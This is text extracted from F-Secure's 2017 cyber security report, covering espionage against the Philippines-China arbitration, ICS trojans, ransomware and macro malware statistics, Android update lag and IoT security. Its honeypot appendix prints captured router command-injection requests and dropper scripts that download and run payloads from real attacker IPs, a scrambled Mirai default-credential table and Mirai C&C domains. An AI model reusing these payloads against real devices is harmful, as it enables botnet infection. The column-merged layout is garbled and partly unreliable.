concerns. a major international law firm representing submit supplemental
arguments
Another politically charged rivalry with a one of the parties.
January 2015
cyber dimension took place on the other It was evident that the threat actors had done DOJ Staff bonus
January 13, 2015.xls
side of the world. Digital espionage rose to careful research beforehand to ensure their
the surface last year in the ongoing dispute campaign would be successful. The carefully December 2014
over territorial rights in the South China Permanent Court of
drafted email text used industry-specific lingo Arbitration announcment
Sea. F-Secure researchers uncovered and and referenced timely topics to reel in their on Phillipines-China
arbitration case
investigated a malware strain targeting targets. The attackers had also done enough
organizations who had one thing in common: reconnaissance to know the recipients were
they all played a role in an arbitration case in a position to be able to disable macro
filed by the Philippines against China. warnings on Microsoft Office products.
Page 49
Nan HAI SHU
Digital espionage rose to the
surface last year in the ongoing
dispute over territorial rights
Without knowing this beforehand, the attackers may have completely different approaches to the in the South China Sea
would be risking an expensive campaign that would entire debate, what happens next is anyones guess.
yield no results. But its safe to say that the South China Sea dispute
The evident goal? To gain visibility into the legal hasnt seen its last cyber incident.
proceedings surrounding the Philippines-China case. More information can be found in our whitepaper
The timing of samples seen in the wild correlated with NanHaiShu: RATing the South China Sea, and
news events related to the case. recommendations in our threat intelligence brief.
The malware payload was a Remote Access Trojan
(RAT) which, once installed, sends information
from the infected machine to a remote C&C server,
for which they used dynamic DNS providers. It can
execute additional JScript and VBScript code, and
not only that, it can download any file the attacker
pleases.
Who was responsible? Technical analysis indicated
an orientation towards code and infrastructure
associated with developers in mainland China. But
more importantly, the selection of organizations
targeted for infiltration are directly relevant to topics
that are of strategic national interest to the Chinese
government.
Macro malware, which began surging again in 2015
after a long decline since the early 2000s, still presents
a concern. Organizations should disable automatic
execution of macro code as an enforced policy for
Microsoft Office.
The judgment in the Philippines v. China case was
handed down by an independent tribunal in July
2016, in favor of the Philippines. Unsurprisingly, China
quickly rejected the ruling. With new presidents at the
helms of both the US and Philippines, both of whom
Page 50
Beyond The Nation State
DURING the latter half of 2010, details turned their gaze toward industrial control
emerged on the Stuxnet sabotage operation, systems.
the first widely publicized cyber attack on In 2014, researchers from our Threat
physical infrastructure. As the world came to Intelligence team looked into one of the
the realization of what future cyber attacks command and control servers that formed
might look like, security researchers around part of the Havex malware infrastructure. The
the world started digging into the details in campaign behind the Havex trojan, dubbed
order to learn how feasible it might be to Dragonfly or Energetic Bear, were at the
replicate such an attack. And it didnt take time known to be performing data collection
them long to realize that industrial control (espionage) activities in Europe and the
systems, and the infrastructure around US, and were suspected to be operating
them, are both heavily insecure and easily with nation-state support. Our researchers
exploitable. What also became quickly noted that multiple trojanized ICS controller
obvious was that these decades-old systems software installers had been found on the
and technologies wouldnt and couldnt be C&C in question (Windows-based software
updated overnight. A whole new window for used to control ICS systems, not the firmware
attack opened up to the world. actually installed on the devices themselves).
It goes without saying that, less than a decade Further investigation revealed that this group
later, that window still very much exists. had managed to place the same trojanized
But whereas a handful of years ago it took packages directly onto vendor download
the resources and tools of a nation state to sites, where unsuspecting victims would
execute such an operation, some of those download and install them. Given that the
same capabilities are in the hands of todays Dragonfly group were only known to carry
everyday cyber crime groups. Stuxnet was the out espionage-related activities, the groups
catalyzing moment in which criminal gangs motives for using these trojanized installers
were unclear (at the time).
Page 51
Beyond The Nation State
Pay
see attacks trickling down from defense contractors
to banks to critical infrastructure to heavy industry
and eventually to everyone else (manufacturing,
retail, SMEs, etc.). And we usually see these trends
Page 53
ON THE
MALWARE
FRONT EXPLOIT KIT TRENDS 55 GUEST ARTICLE
Share Magnitude EK
report AV-TEST 572016
SECURITY FACTS
AT A GLANCE
CYBER CRIMINALS think like business people.2015
And the latest findings and report from AV-
TEST leave no doubt that business is the main
impetus to the development of constantly
new internet threats for all existing device
Rig EK platforms.
2014
At the beginning of 2017 the AV-TEST database
counted over 600,000,000 malware samples.
127,469,002 new malware programs were
added to this database in 2016. This translates 2013
to an average rate of four to five new malware
detections per second.
NOTABLE MALWARE 2016 56 -
locky
ransomware
MACRO 60
malware
High
Week in 2016
Page 55
Notable Malware LOCKY
Locky encrypts files and renames them
with the .locky extension. It will then
2016
provide detailed instructions on how
to make the ransom payment. It usually
arrives onto a system via spam emails,
but has also been found circulating via
malicious images uploaded on Facebook
and LinkedIn accounts.
CERBER
MACRO MALWARE
Macro malware is nothing new but it made a strong comeback Ransomware attacks made a number of headlines in cyber
Cerber spares its attack if the victims
in 2016, which saw a surge in malware taking advantage of the security news last year, claiming victims from the average home
appear to be located in Central Asian
macro feature in Microsoft Office documents. user to more lucrative targets such as hospitals and police
countries. For the rest, it will proceed to
departments. Ransomware capitalizes on the victims fear of
encrypt their files and display a ransom
A macro is basically a set of instructions that can be useful losing their valuable possessions, i.e. data, files, or machines.
note instructing the victims to follow
for automating tasks. In Microsoft Office documents, users It takes these items hostage by encrypting them and then
the next steps. Cerber is distributed via
can create a macro that suits their need either by using the demanding a ransom in exchange for the decryption key.
exploit kits planted on websites.
simplified graphical user interface (GUI) or by coding it from
scratch in Visual Basic for Applications (VBA). Ransomware typically infiltrates a system through malicious
documents attached in spam emails and exploit kits planted on
While useful, a macro also poses security risks. It allows
malware to hide within a seemingly harmless document and
dubious websites. These documents often serve as a downloader
or a dropper that will fetch the ransomware once its payload is
PETYA
tricks the victims into executing malicious code. In a common triggered. To trigger the payload, an action from the victims Unlike other crypto-ransomware, Petya
attack scenario, the victim receives a document attached to side is required; this is achieved by employing social engineering encrypts the systems Master Boot
an email. When opened, contents of the document seem to tactics. Popular tactics include tricking victims into enabling Record (MBR) instead of files. It then
be blocked and can only be viewed by enabling the macro. macros in Microsoft Office documents, and prompting victims forces the system to restart and displays
By enabling the macro, the victim inadvertently executes the into clicking on a button. a ransom demand page featuring a
malwares code. white skull on a red background. Petya
is distributed via spam emails containing
BANKING TROJAN
Page 56
Security Facts GUEST ARTICLE
Olaf Pursche
CYBER CRIMINALS think like detection systems of AV-TEST were aimed at Number of newly discovered and
business people. And the latest findings and Microsofts operating system. According to registered malware samples
report from AV-TEST leave no doubt that the recorded figures for 2016, classic computer Source: AV-TEST Institute (www.av-test.org)
business is the main impetus for the constant viruses represented the main group of malicious
600000000
development of new Internet threats for all programs for Windows, accounting for almost
existing device platforms. At the beginning half of all detections. They were followed by
of 2017 the AV-TEST database counted over worms (over 35%), and trojans with over 20%. Year 2016
600,000,000 malware samples. 127,469,002 Although ransomware filled media headlines 500000000
new malware programs were added to this throughout last year, the overall appearance
database in 2016. This translates to an average of this type of malicious program was relatively
rate of four to five new malware detections per low in 2016. Only about one percent of total
second. malware were crypto-trojans. The enormous 400000000 Year 2015
As a strategic target, Windows systems, not amount of attention the media pays to these
least due to their high prevalence, are of malicious programs is partially justified by
particular interest to criminal threats. In 2016, their most unusual characteristic: while most 300000000
over 99% of all the attacks registered by the types of malware try to remain unidentified
on infected systems for as long as possible, Year 2014
ransomware explicitly reveals itself to victims.
Shocking users with this revelation is strategic, 200000000
as it increases the probability that the victim
There are over 19 million will pay the ransom. Year 2013
malware programs for
Android, making Googles There are over 19 million malware programs 100000000
mobile operating system developed especially for Android, making Year 2012
the main target for mobile Googles mobile operating system the main Year 2011
malware target for mobile malware. The reason for this is Year 2010
Pre -2010
the vast distribution of Android devices, as well 0
Samples
Page 57
Security Facts at a Glance
Number of Malicious Android Apps in AV-TEST's Database as the relatively open system for the distribution of apps. And consequently, over
Total number of Android samples New Android samples per month 99% of all malware programs that target mobile devices are designed for Android
20000000
devices. As AV-TESTs numbers show, the majority of the malicious programs for
18000000 Android are classic trojans. But the full spectrum of malware is present, and we see
16000000
viruses, worms, malicious scripts, backdoors, and special trojans like ransomware
targeting mobile devices. In this light, the malware situation for Android devices is
14000000
following a similar development cycle to what weve already seen with Windows PCs.
12000000 This is no surprise. Practically every application, from email to online banking, which
10000000
just a few years ago had to be completed on a PC, now conveniently functions on a
mobile device via corresponding apps. Lately, the use of specialized trojans appears
8000000
to be especially lucrative for criminals.
6000000
AV-TESTs experts design and build our own custom automation systems to collect,
4000000 register, analyze, and classify malware. And thanks to the effective use of automation,
2000000
one of the worlds largest databases for malware programs is expanding. Its data
volume has been growing continuously for more than 15 years on over 250 servers
0
with a storage capacity of over 2,200 TB. It enables the controlled launch of potential
Jan 2013
Feb 2013
Mar 2013
Apr 2013
May 2013
Jun 2013
Jul 2013
Aug 2013
Sep 2013
Oct 2013
Nov 2013
Dec 2013
Jan 2014
Feb 2014
Mar 2014
Apr 2014
May 2014
Jun 2014
Jul 2014
Aug 2014
Sep 2014
Oct 2014
Nov 2014
Dec 2014
Jan 2015
Feb 2015
Mar 2015
Apr 2015
May 2015
Jun 2015
Jul 2015
Aug 2015
Sep 2015
Oct 2015
Nov 2015
Dec 2015
Jan 2016
Feb 2016
Mar 2016
Apr 2016
May 2016
Jun 2016
Jul 2016
Aug 2016
Sep 2016
Oct 2016
Nov 2016
Dec 2016*
malware so researchers can analyze and classify them. The system automatically
* Dec 2016 data is partial records and tests 1,000,000 spam messages, 500,000 URLs, 500,000 potentially
harmful files, 100,000 innocuous Windows files, and 10,000 Android apps every day.
With these proprietary tools, the AV-TEST Institute is home to one of the worlds
most comprehensive data pools for measuring and classifying malware code, and
AV-TEST GmbH is the leading supplier of services in the fields of IT Security and Antivirus its proliferation in the wild.
Research, focusing on the detection and analysis of the latest malicious software. The AV-TEST
Institutes results provide an exclusive basis of information helping vendors to optimize their
products, magazines to publish research data, and end users to make product choices.
Olaf Pursche
Head of Communications
AV-TEST Institute
Page 58
F-SECURE
State OF
Security Facts at a Glance Cyber
Security
2017
Script
19%
14000000
12000000
Li nux
Mac OS
10000000 Mobile
DOS
0%
8000000
Android
6000000 Jan
Feb 8%
Mar
Apr
4000000 May
Jun
Jul Wi ndows
Aug 67%
2000000 Sep
Oct
Nov
Dec
0
2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 2015 2016 2017* * Jan 2017 data is partial
Page 59
iOS 10.2 was taken up by more
Mobile OS Takeup At A Glance than half of the iOS user base in
just one month
ZZ
Z
100 % 100 %
iOS 10.2
50 % 50 %
7 Nougat
6 Marshmallow
5 Lollipop
4 (all versions)
0% 0%
December 1st half December 2nd half January 1st half October November December
APPLYING the most recent security updates The above graphs show that iOS 10.2 was taken up by purchased between 2011 and 2015. This all adds up to
to your devices operating system is a best practice more than half of the iOS user base in just one month. great news for attackers, who can rely on the fact that
security fundamental. If your device isnt running These numbers reflect those that Apple make publicly large numbers of vulnerable Android devices exist in
the latest version of an operating system, its likely available. On the other hand, Android 7, Nougat, the wild.
vulnerable to some known exploits. Data from which had been on the market for four months On the next page, youll see a breakdown of Android
F-Secure Freedome analytics show that Apples iOS prior to these figures being collected, had a measly operating system versions by region. It illustrates how
distribution and upgrade model is far superior to 1% uptake rate. Marshmallow (Android 6) is at this more affluent countries tend to replace devices more
Androids. While upgrades are actively pushed to iOS point still gaining market share faster than Nougat. often, since its unlikely youll see a device from more
devices (even older ones), Android devices are only Older versions of Android, notably versions 4 and 5, than two years ago running Android versions 6 or 7.
pushed updates if the devices manufacturer goes to continue to dominate Androids market share. Devices
the trouble of preparing them. And they often dont. with these operating systems pre-installed were likely
Page 60
large numbers of
Mobile OS Takeup At A Glance vulnerable Android devices
exist in the wild
100 % 100 %
75 % 75 %
50 % 50 %
25 % 25 %
0% 0%
Indonesia
Philippines
Yemen
Venezuela
Peru
Ukraine
Ecuador
Colombia
Mexico
Sudan
Russia
Argentina
Tunisia
Morocco
Poland
Japan
United States
Algeria
Chile
Singapore
Egypt
Ireland
Syria
Saudi Arabia
France
Thailand
Italy
Nigeria
India
Canada
Austria
Turkey
Iraq
Netherlands
Hong Kong
Jordan
Spain
Germany
Great Britain
Brazil
Sweden
Finland
Norway
7 Nougat 6 Marshmallow 5 Lollipop 4 (all versions)
Client telemetry from F-Secure Freedome show that the takeup rate of new Android versions vary greatly between countries.
The graph is sorted by the rate of version 6 and 7 devices and excludes countries
Page 61with an insufficient number of users.
LOOKING FORWARD
Share
report
Why theres
no S in IoT
THEPHENOMENALgrowth in the number Internet. Yes, Telnet in 2016. Your fridge hit the IoT
of connected devices in the form of the Internet of party wearing a 90s outfit.
Things may be the best argument weve had in a long 2016 was the year television sets started watching their
time for regulating technical cyber security. Minus the watchers and consumers began bringing gadgets
glorified adverts, IoT devices are merely household they could speak with into their homes. Consumers,
objects turned into science fiction props with the help trusting these new devices with their credit card
of unpatched Linux. details, were surprised when their gadgets went on
Large-scale DDoS attacks set new records in 2016. shopping sprees after a random person on television
But this time, a discernible chunk of attack traffic made a remark about buying something. A growing
was sourced not from malware-infected computers number of gadgets, rendered useless because their
but from internet-connected household appliances, services had been discontinued just months after
flat screen televisions, baby monitors, and residential their release, joined the huge pile of mobile phones
building automation. Most devices were running and tablets abandoned by their manufacturers. When
Telnet and accepting default passwords from the support ends, the gadgets stop pretending they care
for you.
In 2016 the FTC, the US federal consumer protection
regulator, successfully tested its ability to regulate
technology vendors proficiency in cyber security.
In landmark rulings, Oracle, Asus and D-link were
all found lacking in their cyber security posture and
were penalized for marketing their products as secure
while, in reality, they werent. While consumers have
reason to be jubilant over the ruling, theres a catch.
The FTC was successful in these cases not because
it has the mandate to regulate the minimum level of
technical cyber security, but because the vendors
Page 63
Why theres no S in IoT
Page 64
Beyond The Horizon
THERE ARE a few facts about computer to an operators network using a zero-rated low-
infrastructure that can be solidly extrapolated into the energy, low-bandwidth, high-latency connection for
future. Storage density will increase, network speeds the purposes of upstreaming telemetry once a week.
will increase, devices will become more powerful and Other IoT devices will probably do the same thing.
use less energy, and batteries will improve. And the Youll no longer have control over whether these
improvements will increase more dramatically as time devices are online or not.
passes. An off-the-shelf computer in 1990 came with On the business side, I expect corporate intranets to
megabytes of disk space. The equivalent computer become a thing of the past. Services youre accessing
today comes with terabytes. In 25 years, weve seen from your companys internal network right now will
storage increase by a factor of almost a million. move to the cloud. Printers will probably be the last
Right now, different people define the Internet in reason youll need to connect to a corporate LAN.
different ways. While some people see it as the web, The complexity of interconnected devices today is
others may see it as apps, the cloud, IoT, chat, or causing us to struggle with their security. But were
streaming video. In the near future, people may define just at the beginning of that struggle. As an example,
the Internet by the AI chat bots theyre interacting right now its possible to perform a full scan of the IPv4
with, or an overlay on their everyday life provided by address space in a reasonable amount of time. Itll be
augmented reality. impossible to scan the full IPv6 address space. Finding
The way devices talk to each other will change a bad stuff on the Internet will be more difficult. But,
lot. And thus, the Internet will not resemble what at the same time, itll be harder for attackers to trawl
we know today. Were already seeing changes in for weak or vulnerable infrastructure.
this direction. Phones are solely connected to the In the not-too-distant future, narrow artificial
Internet via 4G. WiFi connections are available almost intelligence applications will power almost everything
everywhere, and are appearing in places they didnt we interact with. Were already seeing narrow AI in our
used to, such as on planes. Down the road, your IoT homes (Alexa), in our search results (Google), on our
washing machine wont connect to the Internet via phones (Siri), in self-driving cars (Tesla), and even in
your home WiFi as it does today - itll connect directly toys (Anki). AI systems will pose their own security
Page 65
Beyond The Horizon
conundrums. We can find and fix vulnerabilities and single one. Or we may see isolationism give rise to a be widespread and built into services, devices, and
bugs in the code weve written. Doing the same for complete balkanization of the Internet. In the future, applications by default.
emergent logic is a whole different process, and one the world may work together to secure one globally The Internet is evolving. And security will be one
thats not really been explored to any degree. available Internet. Or several separate geopolitical of the factors driving that evolution. Old, insecure
Computers have already morphed into handheld entities will be responsible for securing their own technologies that arent worth saving will die off and
devices (phones and tablets) and are in the process networks independently. And there are bound to be get replaced with new technologies built with security
of doing the same with wearables (watches, jewelry, differences in how they approach that problem. in mind. Stuff thats worth saving, but not yet up to
and glasses). Expect that trend to continue as The way corporations operate and how they handle scratch will adapt. Survival of the fittest.
miniaturization, computing power, and battery data confidentiality and security will change too. Computers and the Internet will undoubtedly evolve at
technology all see incremental improvements. Data already has monetary value, and it will likely an ever faster pace. But whether it be five, ten, or fifty
Wearables will morph into cybernetics such as occular become an even more guarded resource in the future. years from now, well still be talking about security. Its
implants and neural interfaces. The definition of intellectual property may be quite just that the issues well face then will look completely
Robotics will also benefit from advances in technology. different down the road. All of this will shape how different to the issues were facing now.
The IoT of the future will include utility bots in all companies and individuals approach data security. For
instance, the way access controls are implemented Or strong AI will emerge, the singularity will happen,
shapes and sizes, from large construction behemoths, and all bets will be off.
to robotic laborers, to delivery drones, to nanorobots. 50 years from now will be completely different from
And yes, all of these devices will run narrow AI and today.
theyll all send and receive data. Some trends will naturally improve security.
These advances will change the way people consume Cloudification will continue to the point where every Andy Patel
data. Well probably use a lot of augmented or even device is just a connected thin client. Operating Cyber Gandalf
systems will implement more built-in security, such @r0zetta
virtual reality in our everyday lives. Neural computing
interfaces will allow us to download information locally as isolation and sandboxing. Theyll work more
and access it via thought. The way we communicate like Android and iOS than Windows or MacOS.
will change, too. Well use the same neural interface Data wont be stored on devices and applications
to chat with people wirelessly, by thought. Almost wont be installed locally. Systems of the future will
like telepathy. have extremely narrow attack surfaces. Getting at
someones data will be more about social engineering
Changes in geopolitics will undoubtedly affect the way and scamming than about hacking into devices. Most
we approach cyber security. Our world may contain data will be stored on servers. And encryption will
less separate geopolitical spaces, perhaps even just a
Page 66
88 ipc
88
88 mhd lt h
r o ot t x efau ntec
// / ro t o d a
ju ort
APPENDICES
/ oo t 6
// // ro 2345
r o u pp
s
6 ); 5); t
1 1
2 p ort rd
1
,
A 41, ); ) ; roo 54 / su 3 p
s s wo
x / / pa
A\ 2\x , 5 , 5 / t
A \x1 B\x5 E\x56 1\x4A / r
/ 56
oo , 5); i n
x1 4 4 4 dm
1 A\ x46\x 57\x 47\x ); 0 \x ) / /a
x A\ 3\x 6\x 4, 5 5
A\ \x ne t
A \x1 4F\x4 4\x4 C\x5 7\x1 ; \ x 4D (no , 4); roo 2345 12
34
x 1 x x 4 4 1 5 ) 2 t 6 t 1 i n
\ A\ \ \x \x , x5 o x4 oo m
5 6, \x5 6\x47 \x43 \x16 \x13 x52\ // ro x50\ // r root user ad
x , 7 1 0 \ \ / in
D\ 6 x4 x5 1 1 57 4D / r
mi
n
dm
\ x4 D\x5 6, \ x48\ 10\x 11\x 51\x \ x s e e ) ss a d c a
55 // u (no
n pa //
HONEYPOT INTEL 68 NCSC-FIS MIRAI x50\x4xD4D\x4x4D\x\5x56, \, \x13\7x\x16\x56MIRAI 71 , \
x
\ x 5 1\x
SOURCE ;
CODE i n o t 3); 1
73 i n
sm
\ \ \ x 1 ) ; o ,
MITIGATION ntry( (\x50 0\x4D \x4D D\x56 6, \x \x50\ ANALYSIS 1 5
3\x \x56 17,
, 4 4)
/a
r
dm // x16 111 / ad m
d
_ e r y x 5 x 4 D x 4 x 5 4 D ; \ x 4 \ x /
x 11 oot
\ /
1 11 666 swor
h t \ \ \ \ x ) 2 D 6 \ 1 s
au
t _en ry( 50 4D 4D 52\ , 4 \x5 \x4 \x1 3); 10 // r , 3); in 66 pa
x x x
d_ auth _ent ry(\ x50\ x4D\ 52\x x56, 4C, \x4D \x11 x50
,
1 3\x C dm t 6 t
d
a d_ th nt (\ 0\ \x 50 10 7\ \x 4 a o oo
ad d_au th_e ntry \x5 \x57 \x4D \x4B 6, \x 13\x 1\x4
\ \x
, 3); \x4C 4 B\x // // ro // r 23 5
1 1 B \x 4
23 klv1 4C\x
(
ad d_au th_e ntry \x5 \x4D \x4F \x5 6, \x 7\x5 ); 1 \x5 F\x4 ); x 4F 1
0 5 6 \ ; \x ce
(
ad d_au th_e ntry \x5 \x46 \x4D \x5 , \x , , 3 43\x 6\x4 3, 3 3\x4 ;
5
; 6 , 2) root root \x4B servi
( 3 1 )
ad d_au th_e ntry \x4 \x4D \x4D \x50 \x4C 52\x 3\x4 13\x 1\x4 3, 2) 4, 2 0\x4 // // x47 // x4B
u e ( 0 D 7 B x 4 4 1 1 5 F\ \
d
a d_ a t
y 5 4 4
h_ entr (\x 0\x 1\x F\x4 6, , \ x13 4F\ 13\ 14\ 4D\ \ x \ x x x x x
\ x4 , 1); \x54 ues
u
ad d_a th_ ntry \x5 \x5 \x4 \x5 \x4C 13\ 1\x 3\x 4\x 5\x ,
x4 x5 7 0 g
50
( 7
ad d_au th_e ntry \x5 \x46 \x4D \x4B 6, \x , \x 3\x1 14\x 1\x5 );
5 1
, 1); D\x x41\ x47\ uest 12
( 3 1 5 1 x4 \ \ g t
ad d_au th_e ntry \x4 \x4D \x4F \x5 \x4C , \x 14\x 51\x 6, 2 0\x1 x56\ \x4B \x52 // ues t 1
d u e y ( 5 0 4 6 4 D B C \ x \ x x 1 \x 1 3 \ 5 4 5 7 / g s
a d_a th_ ntr \x 4 4 \ x / ue ;
d a u _ e r y ( 4 3\x 4D\x 4F\x 4B\x \x14 \x43 \x11 \x13 0\x4 x50\x x51\ / g
/ , 1)
a d_ th nt (\x 0\x \x \x 6, 52 10 54 x5 7\ , \ ;
ad d_au th_e ntry \x5 \x46 \x4F \x5 6, \x 13\x 4E\x \x56\ 1\x4 x50 6, 1) ; 6
\x4 3\x1
0
d u e y ( 4 3 4 6 4 D 5 \ x \ x 1 x 5 D \ 5 ) 5 0 1
a d_a th_ ntr \x
( 3\x \x \x 6, 49 \x5 , \ x4 1\x 7, 1 ; \x \x /
ad d_au th_e ntry \x4 \x4D \x4D \x5 6, \x \x4B \x47 x51\ 7\x5 6\x1 7, 1) \x4D x50,
( 0 5
ad d_au th_e ntry \x5 \x4D \x4D \x5 \x4C \x41 \x4B\ 7\x4 1\x1 6\x1 1\x5 4D\ , 1); 1);
( 0 x
ad d_au th_e ntry \x5 \x4D \x4D \x4B \x4B \x54 5\x5 0\x1 1\x1 1\x5 x56\ \x14 1A, ubn
d u e y ( 5 0 4 D 4 F 4 0 \x 4 x 1 x 1 5 3 \ 14 \x //
a d_a th_ ntr \x 5 5 x
d a u _ e r y ( 5 0\x 46\x 50\x 47\x 56, \x13\ x10\ x43\ 0\x4 14\x \x1A
a d_ th nt (\x 3\x \x \x \x , 3\ 2\ x5 4\x 1A
ad d_au th_e ntry \x6 \x47 \x52 \x51 \x56 , \x1 , \x5 \x56\ 4\x1 1A\x 1);
d u e y ( 5 1 5 7 4 7 1 6 3 1 1 \ x 1 6,
a d_a th_ ntr \x
( 1\x \x \x5 \x5 \x1 \x5 4\x 1A ); 1\x );
ad d_au th_e ntry \x5 \x57 \x47 \x51 \x4C \x4B , \x1 1A\x 6, 1 0\x1 3, 1
( 5
ad d_au th_e ntry \x4 \x57 \x47 \x4B \x4C \x14 A, \x C\x5 3\x1 0\x1
d a u _ e y ( 45 57 4F B 4 1 x4 x1 x1
a d_
d u th ent y(\x 45\x 46\x 4F\x4 4\x1 1A\x x40\ x54\ x17\
r
a d_a th_ ntr \x
( 3\x \x \x1 A\x 57\ 4E\ 47\
ad d_au th_e ntry \x4 \x46 \x14 \x1 , \x 49\x 56\x
( 3 A
ad d_au th_e ntry \x4 \x14 \x1 \x56 6, \x 78\x
( 4 A
d u
a d_a th_ ntr \x e y 1 x \x4C \x5 6, \x
1
( A\
ad d_au th_e ntry \x1 \x40 \x4D \x5
( 7
ad d_au th_e ntry \x5 \x4D \x4D
d a u _ e r y ( 50 4D
a d_
d u th ent y(\x 50\x
a d_a th_ ntr \x
(
ad d_au th_e ntry
ad d_a th_ u e Share
ad d_au report
ad
Appendix
Honeypot Intel
Krzysztof Marciniak
Python Developer
Cyber Security Services
Misconfigured FrontPage extensions > Origin: example.com The above command is designed to download and run
> User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine;
Scripted attacks like the following example appear to http://nmap.org/book/nse.html) a MIPS executable on the targeted hardware.
be going after misconfigured FrontPage extensions by Home router exploits Similar examples actually use a string of GET requests.
creating a test document and testing for its existence. Heres an example:
Heres an attack weve seen that attempts to perform
> POST /_vti_bin/_vti_aut/author.dll HTTP/1.1 > GET /%3Bchmod$IFS%27777%27$IFS%27/tmp/nmbt2.sh%27
> Accept: auth/sicily cmd injection on hndUnblock.cgi as part of a Linksys > GET /%3Brm$IFS-f$IFS%27/tmp/nmbt2.sh%27
> Cache-Control: no-cache E-Series router flaw exploit (unauthenticated remote > GET /%3Bsh$IFS-c$IFS%27/tmp/nmbt2.sh%27
> Connection: close code execution). > GET /%3Bwget$IFS-O$IFS%27/tmp/nmbt2.sh%27$IFS%27
> Content-Length: 194 http://198.101.14.103/nmbt2.sh%27
> Content-Type: application/x-vermeer-urlencoded > POST /hndUnblock.cgi HTTP/1.0 > GET /cgi/common.cgi
> Host: [redacted] > Accept: */* > GET /stssys.htm
> Mime-Version: 1.0 > Content-Length: 396
> User-Agent: core-project/1.0 > Content-Type: application/x-www-form-urlencoded
> X-Vermeer-Content-Type: application/x-vermeer- > Host: [redacted] When decoded, the commands look like this:
urlencoded > User-Agent: Wget(linux)
> method=put+document%3a4%2e0%2e2%2e4715&service > >GET / ; w g e t $ I F S - O $ I F S / t m p /n m b t 2 . s h $ I F S
%5fname=&document=%5bdocument%5fname%3dcore > submit_button=&change_action=&action=&commit= http://198.101.14.103/nmbt2.sh
%2ehtml%3bmeta%5finfo%3d%5b%5d%5d&put &ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20 > GET /;chmod$IFS777$IFS/tmp/nmbt2.sh
%5foption=over write&comment=&keep%5fchecked % 2 F %74% 6 D %70% 3 B %7 2 % 6 D % 2 0% 2 D % 6 6% 2 0% 6 E % > GET /;sh$IFS-c$IFS/tmp/nmbt2.sh
%5fout=false core-project 6 D % 6 C % 74% 3 1 % 2 E % 7 3 % 6 8% 3 B % 7 7 % 6 7 % 6 5 % 74% 2 0 > GET /;rm$IFS-f$IFS/tmp/nmbt2.sh
> GET /core.html HTTP/1.0 % 2 D % 4 F % 2 0 % 6 E % 6 D % 6 C % 74% 3 1 % 2 E % 7 3 % 6 8 % 2 0
> Connection: close %68%74%74%70%3A%2F%2F%33%31%2E%31%34%38%2E%32
> Host: [redacted] %32%30%2E%33%33%3A%38%30%2F%6E%6D%6C%74%31% We got a hold of the nmbt2.sh script. Heres what it
> User-Agent: core-project/1.0 2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6
D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31- looks like:
%2E%73%68`&StartEPI= #!/bin/sh
TRACE intel gathering cd /tmp
TRACE methods, such as the following example, are rm -f .nttpd
The decoded data looks like this: wget -O .nttpd http://198.101.14.103/.nttpd,17-mips-be-t2
used to read HTTP headers that are otherwise blocked chmod +x .nttpd
bash cd /tmp;rm -f nmlt1.sh;wget -O nmlt1.sh ./.nttpd
from JavaScript access. http://31.148.220.33:80/nmlt1.sh;chmod +x nmlt1.sh;./nmlt1.sh rm -f nmlt1.sh
> OPTIONS / HTTP/1.1 wget -O nmlt1.sh http://198.101.14.103/nmlt1.sh
> Access-Control-Request-Method: TRACE chmod +x nmlt1.sh
> Connection: close ./nmlt1.sh
> Host: [redacted]
Page 68
Appendix: Honeypot Intel
Page 69
Appendix: Honeypot Intel
Page 70
GUEST ARTICLE
Perttu Halonen
Appendix Information Security
1.1 Mitigation Overview An unfortunate effect of blocking the scanning traffic domain : deadaliens[.]us (IDS)
FICORA and NCSC-FI have released a red alert domain : dyndn-web[.]com (IDS)
is that some of the capability to monitor the extent of domain : freewebhost[.]co (IDS)
concerning the botnet attack. Red alert means that the epidemic is lost. domain : gamesupply[.]org (IDS)
public is informed about the situation and immediate domain : kernelorg[.]download (IDS)
actions are needed. NCSC-FI advises users to reboot 1.2 Payload information and malware sample domain
domain
: ocalhost[.]host (IDS)
: padblast[.]net (IDS)
their devices if the device is included in the attached Unfortunately, NCSC-FI doesnt have samples of this domain : riotrewards[.]com (IDS)
list. Rebooting the device removes the malware. The piece of malware. However, discussions with ISPs domain : sc24[.]biz (IDS)
domain : securityupdates[.]us (IDS)
English translation of the alert is available at https:// hint that the malware seen in Finland is very similar domain : sillycatmouth[.]us (IDS)
www.viestintavirasto.fi/en/cybersecurity/alerts/2016/ or the same as reported in https://badcyber.com/ domain : timeserver[.]host (IDS)
hostname : kernelorg[.]dyndn-web[.]com (IDS)
varoitus-2016-04.html. new-mirai-attack-vector-bot-exploits-a-recently- hostname : l[.]ocalhost[.]host (IDS)
Prior to the red alert, NCSC-FI recommended Internet discovered-router-vulnerability/. hostname : mail[.]csgolime[.]com (IDS)
hostname : mail[.]riotrewards[.]com (IDS)
service providers (ISPs) and telecommunication 1.3 Source address information hostname : mta135[.]linksvirtualoffice[.]com (IDS)
operators to block TCP port 7547, which is the port hostname : netcore[.]dyndn-web[.]com (IDS)
This Mirai variation uses worm techniques to spread hostname : ns1[.]deadaliens[.]us (IDS)
where the vulnerable service (TR-064 and TR-069) hostname : ns2[.]deadaliens[.]us (IDS)
itself autonomously.
exploited by Mirais code is located. In some home hostname : ns3[.]ultrabilisim[.]net (IDS)
router models, the service is found on port TCP 5555, Unfortunately, NCSC-FI doesnt have the capability hostname : ns4[.]gamesupply[.]org (IDS)
hostname : ns4[.]riotrewards[.]com (IDS)
but this port may have been utilized also by VPNs and to monitor Mirais command and control traffic. The hostname : ns5[.]gamesupply[.]org (IDS)
other services, so blocking is not recommended. following is a list of known command and control hostname : ns5[.]riotrewards[.]com (IDS)
hostname : ntp[.]timeserver[.]host (IDS)
Some ISPs have nevertheless blocked TCP 5555. server and malware download server addresses that hostname : rep[.]securityupdates[.]us (IDS)
NCSC-FI obtained from elsewhere, and forwarded to hostname : rss[.]myfootbalgamestoday[.]xyz (IDS)
Blocking port 7547 prevents the vulnerable devices hostname : update[.]kernelorg[.]download (IDS)
ISPs on 29 Nov 2016:
from getting hijacked again using the same hostname : updates[.]dyndn-web[.]com (IDS)
comment : Attributes have been enriched with pDNS hostname : v592[.]extramilesolearns[.]com (IDS)
vulnerability until patches are released for the affected results. Therefore correlations could be misleading. hostname : www[.]csgolime[.]com (IDS)
